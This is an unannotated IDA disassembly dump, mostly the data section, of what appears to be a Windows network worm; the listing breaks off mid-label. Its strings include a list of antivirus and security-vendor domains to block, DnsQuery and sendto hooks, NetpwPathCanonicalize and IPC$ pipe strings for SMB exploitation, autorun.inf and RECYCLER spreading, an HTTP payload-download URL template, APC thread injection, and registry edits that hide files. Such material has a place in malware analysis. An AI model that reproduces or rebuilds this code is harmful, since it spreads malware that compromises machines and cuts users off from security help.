db 5Dh, 9Eh, 0CFh
db 0DFh ; ß
db 5Dh, 9Eh, 0CFh
db 0C0h ; À
db 7Bh, 0F0h, 0CFh
db 0DFh ; ß
db 7Bh, 0F0h, 0CFh
db 0
db 0CDh, 1Ah, 0D0h
db 0FFh
db 0CDh, 1Ah, 0D0h
db 0
db 9Dh, 0C5h, 0C0h
; ---------------------------------------------------------------------------
call fword ptr [ebp-18FF3F3Bh]
test esp, ecx
jmp edi
; ---------------------------------------------------------------------------
dw 0CC85h
db 0
db 60h, 48h, 0D8h
; ---------------------------------------------------------------------------
jmp dword ptr [ebx+48h]
; ---------------------------------------------------------------------------
db 0D8h
db 98h ; ˜
db 0A6h, 0E5h, 0CFh
db 9Fh ; Ÿ
db 0A6h, 0E5h, 0CFh
db 0
; ---------------------------------------------------------------------------
xchg eax, ebp
pop edi
int 3 ; Trap to Debugger
call dword ptr [ebp-2AB733A1h]
rcl cl, 4Fh
aad 0C0h
rol dword ptr [eax], 1
retf
; ---------------------------------------------------------------------------
dw 0CE49h
db 0FFh
; ---------------------------------------------------------------------------
retf
; ---------------------------------------------------------------------------
dw 0CE49h
db 0
db 76h, 49h, 0CEh
db 0FFh
db 76h, 49h, 0CEh
db 10h
db 36h, 2Dh, 0D0h
db 17h
db 36h, 2Dh, 0D0h
db 8
db 36h, 2Dh, 0D0h
db 0Fh
db 36h, 2Dh, 0D0h
db 0
db 1Fh, 49h, 0CEh
db 0FFh
db 1Fh, 49h, 0CEh
db 80h ; €
db 32h, 0A1h, 3Fh
db 0FFh
db 32h, 0A1h, 3Fh
db 0
db 32h, 0A1h, 3Fh
db 7Fh ;
db 32h, 0A1h, 3Fh
db 0E0h ; à
db 8, 0F0h, 0CFh
dword_9A345C dd 0CFF008EFh, 9D360000h, 9D3CFFFFh, 0D02D59F8h, 0D02D59FFh
dd 0CEB64500h, 0CEB645FFh, 0CEB6F000h, 0CEB6F0FFh, 0CEB6F100h
dd 0CEB6F1FFh, 0CE494300h, 0CE4943FFh, 0CEB6FB00h, 0CEB6FBFFh
dd 0CEB6F700h, 0CEB6F7FFh, 0CEB6EC00h, 0CEB6ECFFh, 3FECC640h
dd 3FECC647h, 3FECC698h, 3FECC69Fh, 0A579FDE8h, 0A579FDEFh
dd 3FECAA40h, 3FECAA47h, 3FECBA40h, 3FECBA47h, 3FECBB68h
dd 3FECBB6Fh, 3FECBB80h, 3FECBB87h, 3FECBBA0h, 3FECBBA7h
dd 0C7028900h, 0C70289FFh, 0D8DE68E0h, 0D8DE68EFh, 3F975740h
dd 3F975747h, 404D5260h, 404D5267h, 404D5D50h, 404D5D5Fh
dd 41340000h, 4137FFFFh, 0CF2E0000h, 0CF2EFFFFh, 836B0000h
dd 836BFFFFh, 0CF448000h, 0CF44CFFFh, 0CCB69000h, 0CCB69FFFh
dd 0CE6B2200h, 0CE6B22FFh, 0CDF09E00h, 0CDF09FFFh, 0CC4FFC00h
dd 0CC4FFCFFh, 40C8D310h, 40C8D31Fh, 0CB2A300h, 0CB2A31Fh
dd 452C7E50h, 452C7E5Fh, 3FAD2A80h, 3FAD2AFFh, 0C1C6C00h
dd 0C1C6C7Fh, 41AA1D00h, 41AA1D07h, 43848560h, 43848567h
dd 806B000h, 806B0FFh, 0CDF85000h, 0CDF881FFh, 3F947BF0h
dd 3F947BF7h, 4029C100h, 4029C1FFh, 40554620h, 4055462Fh
dd 40555160h, 40555167h, 40555168h, 4055516Fh, 0D820A8E0h
dd 0D820A8FFh, 0CE4F4A20h, 0CE4F4A2Fh, 0D820AFE0h, 0D820AFFFh
dd 0D820B400h, 0D820B7FFh, 0D821E5E0h, 0D821E5FFh, 0D821EC00h
dd 0D821EFFFh, 0D821F000h, 0D821F3FFh, 0D820F000h, 0D820F3FFh
dd 0D8223300h, 0D82233FFh, 0D1017000h, 0D10170FFh, 0D1017100h
dd 0D10171FFh, 0D1010F00h, 0D1010FFFh, 0D82235B0h, 0D82235BFh
dd 0D82308E0h, 0D82308EFh, 0D1B98000h, 0D1B983FFh, 4172AF80h
dd 4172AF9Fh, 400FE560h, 400FE57Fh, 400FB100h, 400FB1FFh
dd 400FAAC0h, 400FAAC7h, 0D18FEE00h, 0D18FEEFFh, 400FB200h
dd 400FB2FFh, 4223D178h, 4223D17Fh, 4223D380h, 4223D3BFh
dd 4223D030h, 4223D03Fh, 0D8219400h, 0D82197FFh, 0D8234258h
dd 0D823425Fh, 0CE620A0h, 0CE620A7h, 0C357C00h, 0C357C1Fh
dd 0CE81260h, 0CE8127Fh, 0CBE9E00h, 0CBE9EFFh, 0C47C420h
dd 0C47C42Fh, 0D1F0C000h, 0D1F0DFFFh, 46250000h, 4625BFFFh
dd 0C3157C0h, 0C3157FFh, 4A5DCD90h, 4A5DCD97h, 4A5DCD98h
dd 4A5DCD9Fh, 4A5DCE40h, 4A5DCE47h, 46598B78h, 46598B7Fh
dd 0CE477700h, 0CE4777FFh, 0CE477500h, 0CE4775FFh, 0CE477600h
dd 0CE4776FFh, 0D19A9B70h, 0D19A9B77h, 41443E98h, 41443E9Fh
dd 4327D0A8h, 4327D0AFh, 41F24300h, 41F243FFh, 0CC47BF00h
dd 0CC47BFFFh, 3FC29B90h, 3FC29B97h, 428855C0h, 428855C7h
dd 407CB848h, 407CB84Fh, 0D8C8CE00h, 0D8C8CEFFh, 3F505D00h
dd 3F505D7Fh, 43C0E1D0h, 43C0E1DFh, 454AA200h, 454AA2FFh
dd 41DD0500h, 41DD05FFh, 4A5DCD90h, 4A5DCD97h, 4A5DCD98h
dd 4A5DCD9Fh, 4A5DCE40h, 4A5DCE47h, 46598B78h, 46598B7Fh
dd 41F85500h, 41F855FFh, 0C7F39DC0h, 0C7F39DDFh, 0C7F39D70h
dd 0C7F39D77h, 41C2D2E0h, 41C2D2FFh, 0D0C28B00h, 0D0C28BFFh
dd 0D0CC3180h, 0D0CC31FFh, 0D0CD1A00h, 0D0CD1AFFh, 0D0D9B800h
dd 0D0D9BBFFh, 0D0DEAC00h, 0D0DEACFFh, 0D0E0C840h, 0D0E0C85Fh
dd 0D0E56400h, 0D0E565FFh, 0D0F11300h, 0D0F1130Fh, 0D0F11310h
dd 0D0F1131Fh, 0D0F109E0h, 0D0F109EFh, 0D0F46C00h, 0D0F46C0Fh
dd 0D0F51000h, 0D0F5101Fh, 0D0F911A0h, 0D0F911AFh, 3F68D800h
dd 3F68D87Fh, 3F45F500h, 3F45F5FFh, 445A8D48h, 445A8D4Fh
dd 3FC67BA0h, 3FC67BA7h, 44F83040h, 44F83047h, 44F83048h
dd 44F8304Fh, 633108F8h, 633108FFh, 4126AC48h, 4126AC4Fh
dd 4126AC60h, 4126AC6Fh, 4B95AE10h, 4B95AE17h, 4B9764F0h
dd 4B9764FFh, 40510860h, 4051087Fh, 4370FF90h, 4370FF97h
dd 3FF0C9B0h, 3FF0C9BFh, 0CE10D1D0h, 0CE10D1DFh, 3FF0C3D0h
dd 3FF0C3DFh, 0CE10CC40h, 0CE10CC4Fh, 0CE10DF00h, 0CE10DFFFh
dd 3FF0D800h, 3FF0DBFFh, 3FF0DC00h, 3FF0DFFFh, 0CE10F618h
dd 0CE10F61Fh, 3FF0C3C0h, 3FF0C3CFh, 0CE10E0A0h, 0CE10E0BFh
dd 43C02730h, 43C0273Fh, 4820F0A0h, 4820F0AFh, 4820C998h
dd 4820C99Fh, 43275198h, 4327519Fh, 45147F20h, 45147F27h
dd 0D8341C00h, 0D8341CFFh, 462AE600h, 462AE7FFh, 3FFB6100h
dd 3FFB61FFh, 43788480h, 43788487h, 43788498h, 4378849Fh
dd 437884C0h, 437884CFh, 437884D0h, 437884DFh, 447B4F40h
dd 447B4F4Fh, 447B4F30h, 447B4F37h, 447B4F50h, 447B4F5Fh
dd 43762BE0h, 43762BE7h, 45E5D0E0h, 45E5D0E7h, 427A55C8h
dd 427A55CFh, 3FC91248h, 3FC9124Fh, 4B27F490h, 4B27F497h
dd 4B2071B8h, 4B2071BFh, 41DFC400h, 41DFC4FFh, 0D1F90B00h
dd 0D1F90B0Fh, 43C0DEC0h, 43C0DECFh, 407C4410h, 407C441Fh
dd 43C0A850h, 43C0A85Fh, 57EE3080h, 57EE308Fh, 42232000h
dd 42233FFFh, 42232D00h, 42232DFFh, 0C72BB900h, 0C72BC2FFh
dd 0C7557D00h, 0C7557FFFh, 0C6062000h, 0C6063FFFh, 0CCB26EE0h
dd 0CCB26EFFh, 0D80AC000h, 0D80ACFFFh, 41796D00h, 41796DFFh
dd 417D1D00h, 417D1D7Fh, 9B400000h, 9B40FFFFh, 0CECC0AC0h
dd 0CECC0ADFh, 0D8FA1000h, 0D8FA1FFFh, 0D82389A0h, 0D82389BFh
dd 0D8238980h, 0D823898Fh, 0D82389C0h, 0D82389FFh, 0C9B3AB0h
dd 0C9B3ABFh, 0D15A70B0h, 0D15A70BFh, 427F41B8h, 427F41BFh
dd 41431FB0h, 41431FB7h, 43625C00h, 43625CFFh, 4362DF00h
dd 4362DFFFh, 4158B200h, 4158B2FFh, 43634B00h, 43634BFFh
dd 43636900h, 4363691Fh, 41D3F300h, 41D3F37Fh, 4362E200h
dd 4362E2FFh, 0D88E0C00h, 0D88E0C1Fh, 41587E00h, 41587E1Fh
dd 415B9F60h, 415B9F7Fh, 415A2960h, 415A297Fh, 0CC109B20h
dd 0CC109B3Fh, 0D1BEE510h, 0D1BEE51Fh, 0D1B7EB90h, 0D1B7EB9Fh
dd 0D1B7F320h, 0D1B7F32Fh, 0D1B7C20Ch, 0D1B7C20Fh, 4799EF00h
dd 4799EF07h, 4B0AF2A8h, 4B0AF2AFh, 4B362FB0h, 4B362FB7h
dd 40AB7D80h, 40AB7D87h, 0D0C27400h, 0D0C274FFh, 0D0C29800h
dd 0D0C298FFh, 0D0D5F200h, 0D0D5F2FFh, 4B0A4040h, 4B0A405Fh
dd 41DEC000h, 41DEC0FFh, 628177A0h, 628177A7h, 424D8200h
dd 424D8207h, 0D556AC80h, 0D556AC9Fh, 0D5F40A40h, 0D5F40A4Fh
dd 48ECA780h, 48ECA79Fh, 403AB000h, 403AB0FFh, 0CAB9A90h
dd 0CAB9A97h, 0D86F6C60h, 0D86F6C7Fh, 0CDA85560h, 0CDA8557Fh
dd 3F97E940h, 3F97E95Fh, 3F95E4A0h, 3F95E4BFh, 3F95EE40h
dd 3F95EE5Fh, 3F91F420h, 3F91F43Fh, 417AF100h, 417AF11Fh
dd 42B45000h, 42B45FFFh, 0D8638000h, 0D8638FFFh, 0D8680000h
dd 0D8681FFFh, 447EF7F8h, 447EF7FFh, 43420C80h, 43420C87h
dd 40511080h, 4051109Fh, 9BD4F140h, 9BD4F147h, 9BD4E5C0h
dd 9BD4E5DFh, 0D8291B08h, 0D8291B0Fh, 4AD38940h, 4AD3895Fh
dd 4AD388A0h, 4AD388A7h, 4569B538h, 4569B53Fh, 428C29C0h
dd 428C29C7h, 478A70C0h, 478A70DFh, 3FCBCA08h, 3FCBCA0Fh
dd 45E20470h, 45E2047Fh, 4B0BFB80h, 4B0BFB9Fh, 4CE34298h
dd 4CE3429Fh, 4CF9A800h, 4CF9A807h, 63929FC0h, 63929FC7h
dd 43729888h, 4372988Fh, 41D09D10h, 41D09D1Fh, 41D6AC00h
dd 41D6ACFFh, 437F4D00h, 437F4D0Fh, 74726563h, 2Eh, 736E6173h
dd 2Eh, 39746962h, 2Eh, 2E746576h, 0
dword_9A3C58 dd 2E677661h, 0 ; DATA XREF: .text:009B94D4�o
dword_9A3C60 dd 2E707661h, 0 ; DATA XREF: .text:009B94D0�o
dword_9A3C68 dd 2E6163h ; DATA XREF: .text:009B94CC�o
dword_9A3C6C dd 2E69616Eh, 0 ; DATA XREF: .text:off_9B94C8�o
aWindowsupdate db 'windowsupdate',0 ; DATA XREF: .text:009B94C4�o
align 4
aWilderssecurit db 'wilderssecurity',0 ; DATA XREF: .text:009B94C0�o
aThreatexpert db 'threatexpert',0 ; DATA XREF: .text:009B94BC�o
align 4
aCastlecops db 'castlecops',0 ; DATA XREF: .text:009B94B8�o
align 10h
aSpamhaus db 'spamhaus',0 ; DATA XREF: .text:009B94B4�o
align 4
aCpsecure db 'cpsecure',0 ; DATA XREF: .text:009B94B0�o
align 4
aArcabit db 'arcabit',0 ; DATA XREF: .text:009B94AC�o
aEmsisoft db 'emsisoft',0 ; DATA XREF: .text:009B94A8�o
align 4
aSunbelt db 'sunbelt',0 ; DATA XREF: .text:009B94A4�o
aSecurecomputin db 'securecomputing',0 ; DATA XREF: .text:009B94A0�o
aRising db 'rising',0 ; DATA XREF: .text:009B949C�o
align 4
aPrevx db 'prevx',0 ; DATA XREF: .text:009B9498�o
align 4
aPctools db 'pctools',0 ; DATA XREF: .text:009B9494�o
aNorman db 'norman',0 ; DATA XREF: .text:009B9490�o
align 4
aK7computing db 'k7computing',0 ; DATA XREF: .text:009B948C�o
aIkarus db 'ikarus',0 ; DATA XREF: .text:009B9488�o
align 4
aHauri db 'hauri',0 ; DATA XREF: .text:009B9484�o
align 10h
aHacksoft db 'hacksoft',0 ; DATA XREF: .text:009B9480�o
align 4
aGdata db 'gdata',0 ; DATA XREF: .text:009B947C�o
align 4
aFortinet db 'fortinet',0 ; DATA XREF: .text:009B9478�o
align 10h
aEwido db 'ewido',0 ; DATA XREF: .text:009B9474�o
align 4
aClamav db 'clamav',0 ; DATA XREF: .text:009B9470�o
align 10h
aComodo db 'comodo',0 ; DATA XREF: .text:009B946C�o
align 4
aQuickheal db 'quickheal',0 ; DATA XREF: .text:009B9468�o
align 4
aAvira db 'avira',0 ; DATA XREF: .text:009B9464�o
align 4
aAvast db 'avast',0 ; DATA XREF: .text:009B9460�o
align 4
aEsafe db 'esafe',0 ; DATA XREF: .text:009B945C�o
align 4
aAhnlab db 'ahnlab',0 ; DATA XREF: .text:009B9458�o
align 4
aCentralcommand db 'centralcommand',0 ; DATA XREF: .text:009B9454�o
align 4
aDrweb db 'drweb',0 ; DATA XREF: .text:009B9450�o
align 4
aGrisoft db 'grisoft',0 ; DATA XREF: .text:009B944C�o
aEset db 'eset',0 ; DATA XREF: .text:009B9448�o
align 4
aNod32 db 'nod32',0 ; DATA XREF: .text:009B9444�o
align 4
aFProt db 'f-prot',0 ; DATA XREF: .text:009B9440�o
align 4
aJotti db 'jotti',0 ; DATA XREF: .text:009B943C�o
align 4
aKaspersky db 'kaspersky',0 ; DATA XREF: .text:009B9438�o
align 10h
aFSecure db 'f-secure',0 ; DATA XREF: .text:009B9434�o
align 4
aComputerassoci db 'computerassociates',0 ; DATA XREF: .text:009B9430�o
align 10h
aNetworkassocia db 'networkassociates',0 ; DATA XREF: .text:009B942C�o
align 4
aEtrust db 'etrust',0 ; DATA XREF: .text:009B9428�o
align 4
aPanda db 'panda',0 ; DATA XREF: .text:009B9424�o
align 4
aSophos db 'sophos',0 ; DATA XREF: .text:009B9420�o
align 4
aTrendmicro db 'trendmicro',0 ; DATA XREF: .text:009B941C�o
align 4
aMcafee db 'mcafee',0 ; DATA XREF: .text:009B9418�o
align 10h
aNorton db 'norton',0 ; DATA XREF: .text:009B9414�o
align 4
aSymantec db 'symantec',0 ; DATA XREF: .text:009B9410�o
align 4
aMicrosoft db 'microsoft',0 ; DATA XREF: .text:009B940C�o
align 10h
aDefender db 'defender',0 ; DATA XREF: .text:009B9408�o
align 4
aRootkit db 'rootkit',0 ; DATA XREF: .text:009B9404�o
aMalware db 'malware',0 ; DATA XREF: .text:009B9400�o
aSpyware db 'spyware',0 ; DATA XREF: .text:009B93FC�o
aVirus db 'virus',0 ; DATA XREF: .text:off_9B93F8�o
align 4
; IID stru_9A3E8C
stru_9A3E8C dd 304CE942h ; Data1 ; DATA XREF: sub_9A8DF5+1E�o
dw 6E39h ; Data2
dw 40D8h ; Data3
db 94h, 3Ah, 0B9h, 13h, 0C4h, 0Ch, 9Ch, 0D4h; Data4
; IID stru_9A3E9C
stru_9A3E9C dd 0F7898AF5h ; Data1 ; DATA XREF: sub_9A8DF5+15�o
dw 0CAC4h ; Data2
dw 4632h ; Data3
db 0A2h, 0ECh, 0DAh, 6, 0E5h, 11h, 1Ah, 0F2h; Data4
; IID stru_9A3EAC
stru_9A3EAC dd 0CA545C6h ; Data1 ; DATA XREF: sub_9A8EDE+72�o
dw 37ADh ; Data2
dw 4A6Ch ; Data3
db 0BFh, 92h, 9Fh, 76h, 10h, 6, 7Eh, 0F5h; Data4
; IID stru_9A3EBC
stru_9A3EBC dd 0E0483BA0h ; Data1 ; DATA XREF: sub_9A8EDE+6A�o
dw 47FFh ; Data2
dw 4D9Ch ; Data3
db 0A6h, 0D6h, 77h, 41h, 0D0h, 0B1h, 95h, 0F7h; Data4
; char a08x08x[]
a08x08x db '%08x%08x',0 ; DATA XREF: sub_9A9072+74�o
align 4
stru_9A3ED8 _msEH <0FFFFFFFFh, offset loc_9A9185, offset loc_9A9189>
; DATA XREF: sub_9A90FF+2�o
; char aTcp[]
aTcp db 'TCP',0 ; DATA XREF: sub_9A9199+A6�o
; sub_9A932E+90�o
; char aD[]
aD db '%d',0 ; DATA XREF: sub_9A9199+1C�o
; sub_9B5214+11F�o ...
align 10h
stru_9A3EF0 _msEH <0FFFFFFFFh, offset loc_9A9278, offset loc_9A927C>
; DATA XREF: sub_9A9199+5�o
align 10h
stru_9A3F00 _msEH <0FFFFFFFFh, offset loc_9A931A, offset loc_9A931E>
; DATA XREF: sub_9A9289+5�o
; char aU[]
aU db '%u',0 ; DATA XREF: sub_9A932E+2A�o
; sub_9A932E+A3�o ...
align 10h
stru_9A3F10 _msEH <0FFFFFFFFh, offset loc_9A945D, offset loc_9A9461>
; DATA XREF: sub_9A932E+5�o
aHttpWww_getmyi db 'http://www.getmyip.org',0 ; DATA XREF: .text:009B94F4�o
align 4
aHttpWww_whatsm db 'http://www.whatsmyipaddress.com',0 ; DATA XREF: .text:009B94F0�o
aHttpWww_whatis db 'http://www.whatismyip.org',0 ; DATA XREF: .text:009B94EC�o
align 10h
aHttpCheckip_dy db 'http://checkip.dyndns.org',0 ; DATA XREF: .text:off_9B94E8�o
align 4
; char SubStr[]
SubStr db 'ip address',0 ; DATA XREF: sub_9A9471+7E�o
align 4
stru_9A3F98 _msEH <0FFFFFFFFh, offset loc_9A956C, offset loc_9A9570>
; DATA XREF: sub_9A9471+2�o
align 8
stru_9A3FA8 _msEH <0FFFFFFFFh, offset loc_9A961C, offset loc_9A9620>
; DATA XREF: sub_9A9580+2�o
; char aHttpD_D_D_DDS[]
aHttpD_D_D_DDS db 'http://%d.%d.%d.%d:%d/%s',0 ; DATA XREF: sub_9A9654+2A�o
; sub_9AECA4+3B�o
align 10h
; char aSIpc_0[]
aSIpc_0 db '\\%s\IPC$',0 ; DATA XREF: sub_9A9744+12�o
; sub_9A9BBC+12E�o
align 4
aAaa: ; DATA XREF: sub_9A97A7+55�o
unicode 0, <AAA>,0
aS_0 db 'S',0 ; DATA XREF: sub_9A97A7+50�o
aVivivivi db 'V‰V‰V‰V‰',0
align 10h
aM db 'M',0 ; DATA XREF: sub_9A97A7+4B�o
aVivi db 'V‰V‰',0
align 4
; unsigned __int8 ProtSeq
ProtSeq db 'ncacn_np',0 ; DATA XREF: sub_9A97A7+1F�o
; sub_9A983B+22�o
align 8
stru_9A4008 _msEH <0FFFFFFFFh, offset loc_9A9812, offset loc_9A9820>
; DATA XREF: sub_9A97A7+2�o
; unsigned __int8 Endpoint
Endpoint dd 7069705Ch, 72735C65h, 63767376h, 0 ; DATA XREF: sub_9A9BBC+98�o
aHhdhh: ; DATA XREF: sub_9A983B+7D�o
unicode 0, <HHDHH>,0
asc_9A4030: ; DATA XREF: sub_9A983B+69�o
; sub_9A98F7+B7�o
unicode 0, <\>,0
align 8
stru_9A4038 _msEH <0FFFFFFFFh, offset loc_9A98CE, offset loc_9A98DC>
; DATA XREF: sub_9A983B+5�o
; unsigned __int8 dword_9A4044
dword_9A4044 dd 7069705Ch, 72625C65h, 6573776Fh, 72h ; DATA XREF: sub_9A98F7+25C�o
dword_9A4054 dd 0B6244A92h, 37F50397h, 0 ; DATA XREF: sub_9A98F7+234�o
a____: ; DATA XREF: sub_9A98F7+10D�o
unicode 0, <\..\..\>,0
; char aD_D_D_D[]
aD_D_D_D db '\\%d.%d.%d.%d',0 ; DATA XREF: sub_9A98F7+21�o
align 10h
; char aD_D_D_D_0[]
aD_D_D_D_0 db '%d.%d.%d.%d',0 ; DATA XREF: sub_9A9BBC+2D�o
; wchar_t a__
a__: ; DATA XREF: sub_9A9D17+1D�o
unicode 0, <\..\>,0
align 4
stru_9A4098 _msEH <0FFFFFFFFh, offset loc_9A9D5E, offset loc_9A9D62>
; DATA XREF: sub_9A9D17+2�o
align 8
stru_9A40A8 _msEH <0FFFFFFFFh, offset loc_9A9DC1, offset loc_9A9DC5>
; DATA XREF: sub_9A9DA5+2�o
align 8
stru_9A40B8 _msEH <0FFFFFFFFh, offset loc_9A9E49, offset loc_9A9E4D>
; DATA XREF: sub_9A9E22+2�o
align 8
stru_9A40C8 _msEH <0FFFFFFFFh, offset loc_9A9F04, offset loc_9A9F08>
; DATA XREF: sub_9A9E95+5�o
align 8
stru_9A40D8 _msEH <0FFFFFFFFh, offset loc_9A9F9A, offset loc_9A9F9E>
; DATA XREF: sub_9A9F50+5�o
align 8
stru_9A40E8 _msEH <0FFFFFFFFh, offset loc_9AA039, offset loc_9AA03D>
; DATA XREF: sub_9A9FE6+5�o
align 8
stru_9A40F8 _msEH <0FFFFFFFFh, offset loc_9AA121, offset loc_9AA125>
; DATA XREF: sub_9AA082+5�o
align 8
stru_9A4108 _msEH <0FFFFFFFFh, 0, offset nullsub_1> ; DATA XREF: sub_9AA135+2�o
align 8
stru_9A4118 _msEH <0FFFFFFFFh, offset loc_9AA28A, offset loc_9AA28E>
; DATA XREF: sub_9AA1CD+5�o
align 8
stru_9A4128 _msEH <0FFFFFFFFh, offset loc_9AA3ED, offset loc_9AA3F1>
; DATA XREF: sub_9AA2CE+2�o
; char dword_9A4134[]
dword_9A4134 dd 6174656Eh, 32336970h, 6C6C642Eh, 0 ; DATA XREF: sub_9AA482+F�o
; char aNetpwpathcanon[]
aNetpwpathcanon db 'NetpwPathCanonicalize',0 ; DATA XREF: sub_9AA482+A�o
align 4
; char aNtdll_dll[]
aNtdll_dll db 'ntdll.dll',0 ; DATA XREF: sub_9AA49F+F�o
; sub_9ABCA4+B8�o ...
align 4
; char aNtqueryinforma[]
aNtqueryinforma db 'NtQueryInformationProcess',0 ; DATA XREF: sub_9AA49F+A�o
; sub_9ABECA+8�o ...
align 4
; char aQuery_main[]
aQuery_main db 'Query_Main',0 ; DATA XREF: sub_9AA4BC+56�o
align 10h
; char aDnsquery_w[]
aDnsquery_w db 'DnsQuery_W',0 ; DATA XREF: sub_9AA4BC+3F�o
align 4
; char aDnsquery_utf8[]
aDnsquery_utf8 db 'DnsQuery_UTF8',0 ; DATA XREF: sub_9AA4BC+28�o
align 4
; char aDnsapi_dll[]
aDnsapi_dll db 'dnsapi.dll',0 ; DATA XREF: sub_9AA4BC+13�o
align 4
; char aDnsquery_a[]
aDnsquery_a db 'DnsQuery_A',0 ; DATA XREF: sub_9AA4BC+E�o
align 4
; char aWs2_32_dll[]
aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_9AA53A+24�o
align 10h
; char aSendto[]
aSendto db 'sendto',0 ; DATA XREF: sub_9AA53A+1F�o
align 4
; char ModuleName[]
ModuleName db 'dnsrslvr.dll',0 ; DATA XREF: sub_9AA53A�o
align 4
; const WCHAR aSvchost_exeKNe
aSvchost_exeKNe: ; DATA XREF: sub_9AA56C:loc_9AA56F�o
unicode 0, <svchost.exe -k NetworkService>,0
; char asc_9A4224[]
asc_9A4224 db ' ',0 ; DATA XREF: sub_9AA5D4:loc_9AA5E7�o
; sub_9AA6DB:loc_9AA716�o
align 4
; char asc_9A4228[]
asc_9A4228 db 0Dh,0Ah,0 ; DATA XREF: sub_9AA640:loc_9AA665�o
; sub_9AE6A2+189�o
align 4
asc_9A422C: ; DATA XREF: sub_9AA640:loc_9AA65E�o
dw 0Dh
unicode 0, <>,0
asc_9A4230: ; DATA XREF: sub_9AA640+17�o
dw 0Ah
unicode 0, <>,0
; char asc_9A4234[]
asc_9A4234 db ';',0 ; DATA XREF: sub_9AA6DB:loc_9AA728�o
align 4
; char asc_9A4238[]
asc_9A4238 db '=',0 ; DATA XREF: sub_9AA7AA+7C�o
; sub_9AA85A+154�o
align 4
; char asc_9A423C[]
asc_9A423C db ']',0 ; DATA XREF: sub_9AA7AA+3A�o
; sub_9AA85A+93�o
align 10h
asc_9A4240: ; DATA XREF: sub_9AA7AA+A�o
; sub_9AA85A+6C�o
unicode 0, <[>,0
a4_0 db ',4',0 ; DATA XREF: sub_9AA85A+1B4�o
align 4
aSystem32Shell3 db '\system32\shell32.dll',0 ; DATA XREF: sub_9AA85A+1A4�o
align 10h
aWindir db '%windir%',0 ; DATA XREF: sub_9AA85A+198�o
align 4
aSystemroot db '%systemroot%',0 ; DATA XREF: sub_9AA85A+191�o
align 4
aAutorun db 'autorun',0 ; DATA XREF: sub_9AA85A+80�o
aUseautoplay1 db 'useautoplay=1',0 ; DATA XREF: sub_9AA85A+3A�o
align 4
; char aIcon[]
aIcon db 'icon',0 ; DATA XREF: sub_9AA85A+1E�o
; sub_9AA85A:loc_9AA9D3�o
align 4
; char aAction[]
aAction db 'action',0 ; DATA XREF: sub_9AA85A+16�o
; sub_9AA85A:loc_9AAA15�o
align 4
aOpen db 'open',0 ; DATA XREF: sub_9AA85A+11�o
align 4
aShellexecute db 'shellexecute',0 ; DATA XREF: sub_9AA85A+7�o
align 4
aRundll32 db 'rundll32',0 ; DATA XREF: sub_9AAAA0+41�o
align 4
stru_9A42C8 _msEH <0FFFFFFFFh, offset loc_9AAB77, offset loc_9AAB7B>
; DATA XREF: sub_9AAAA0+2�o
; char a_SSS_SS[]
a_SSS_SS db '.\%s\%s\%s.%s,%s',0 ; DATA XREF: sub_9AABA4+3D8�o
align 4
; char aSautorun_inf[]
aSautorun_inf db '%sautorun.inf',0 ; DATA XREF: sub_9AABA4+345�o
align 4
; char aSS_1[]
aSS_1 db '%s\%s',0 ; DATA XREF: sub_9AABA4+27C�o
align 10h
; char aSS_0[]
aSS_0 db '%s%s',0 ; DATA XREF: sub_9AABA4+21D�o
align 4
; char aSSSS_S[]
aSSSS_S db '%s%s\%s\%s.%s',0 ; DATA XREF: sub_9AABA4+1B9�o
align 4
; char aSDDDDDDDDDDDDD[]
aSDDDDDDDDDDDDD db 'S-%d-%d-%d-%d%d%d-%d%d%d-%d%d%d-%d',0 ; DATA XREF: sub_9AABA4+13E�o
align 4
; char aRecycler[]
aRecycler db 'RECYCLER',0 ; DATA XREF: sub_9AABA4+B1�o
align 4
; char aDll_0[]
aDll_0 db 'dll',0 ; DATA XREF: sub_9AABA4+86�o
align 10h
stru_9A4350 _msEH <0FFFFFFFFh, offset loc_9AAFAF, offset loc_9AAFB3>
; DATA XREF: sub_9AABA4+5�o
; char aExplorerS[]
aExplorerS db 'explorer %s',0 ; DATA XREF: sub_9AB1F2+A2�o
; char a__0[]
a__0 db '.',0 ; DATA XREF: sub_9AB1F2+8E�o
align 10h
; char aSoftwareMicr_0[]
aSoftwareMicr_0 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folde'
; DATA XREF: sub_9AB1F2+14�o
db 'r\Hidden\SHOWALL',0
align 4
; char aCheckedvalue[]
aCheckedvalue db 'CheckedValue',0 ; DATA XREF: sub_9AB1F2+F�o
align 4
; char aOpenFolderToVi[]
aOpenFolderToVi db 'Open folder to view files',0 ; DATA XREF: sub_9AB2C3:loc_9AB301�o
align 10h
; char aShell32_dll[]
aShell32_dll db 'shell32.dll',0 ; DATA XREF: sub_9AB2C3+7�o
; char aKernel32_dll[]
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_9AB6A9+18�o
; sub_9ABCA4+5A�o ...
align 4
; char aThread08xStatu[]
aThread08xStatu db 'thread: %08x, status: %08x',0Ah,0 ; DATA XREF: sub_9ABCA4+148�o
; char aLoadlibraryexa[]
aLoadlibraryexa db 'LoadLibraryExA',0 ; DATA XREF: sub_9ABCA4+CD�o
align 4
; char aNtqueueapcthre[]
aNtqueueapcthre db 'NtQueueApcThread',0 ; DATA XREF: sub_9ABCA4:loc_9ABD57�o
align 4
; char ProcName[]
ProcName db 'LoadLibraryA',0 ; DATA XREF: sub_9ABCA4+55�o
align 4
; char aNtsetinformati[]
aNtsetinformati db 'NtSetInformationProcess',0 ; DATA XREF: sub_9ABFFB+24�o
align 8
stru_9A4478 _msEH <0FFFFFFFFh, offset loc_9AC24C, offset loc_9AC250>
; DATA XREF: sub_9AC163+2�o
dd 7073796Dh, 2E656361h, 6D6F63h ; DATA XREF: .text:009B9AC4�o
dd 2E6E736Dh, 6D6F63h ; DATA XREF: .text:009B9AC0�o
; .text:009B9D34�o
dd 79616265h, 6D6F632Eh, 0 ; DATA XREF: .text:009B9ABC�o
dword_9A44A4 dd 2E6E6E63h, 6D6F63h ; DATA XREF: .text:009B9AB8�o
dword_9A44AC dd 2E6C6F61h, 6D6F63h ; DATA XREF: .text:off_9B9AB4�o
; char aHttpWww_S[]
aHttpWww_S db 'http://www.%s',0 ; DATA XREF: sub_9AC476+20�o
; sub_9ADB52+2C�o
align 8
stru_9A44C8 _msEH <0FFFFFFFFh, offset loc_9AC6DE, offset loc_9AC6E2>
; DATA XREF: sub_9AC5BB+2�o
align 8
stru_9A44D8 _msEH <0FFFFFFFFh, offset loc_9AC8DF, offset loc_9AC8E3>
; DATA XREF: sub_9AC789+2�o
; char aN08x08x08x[]
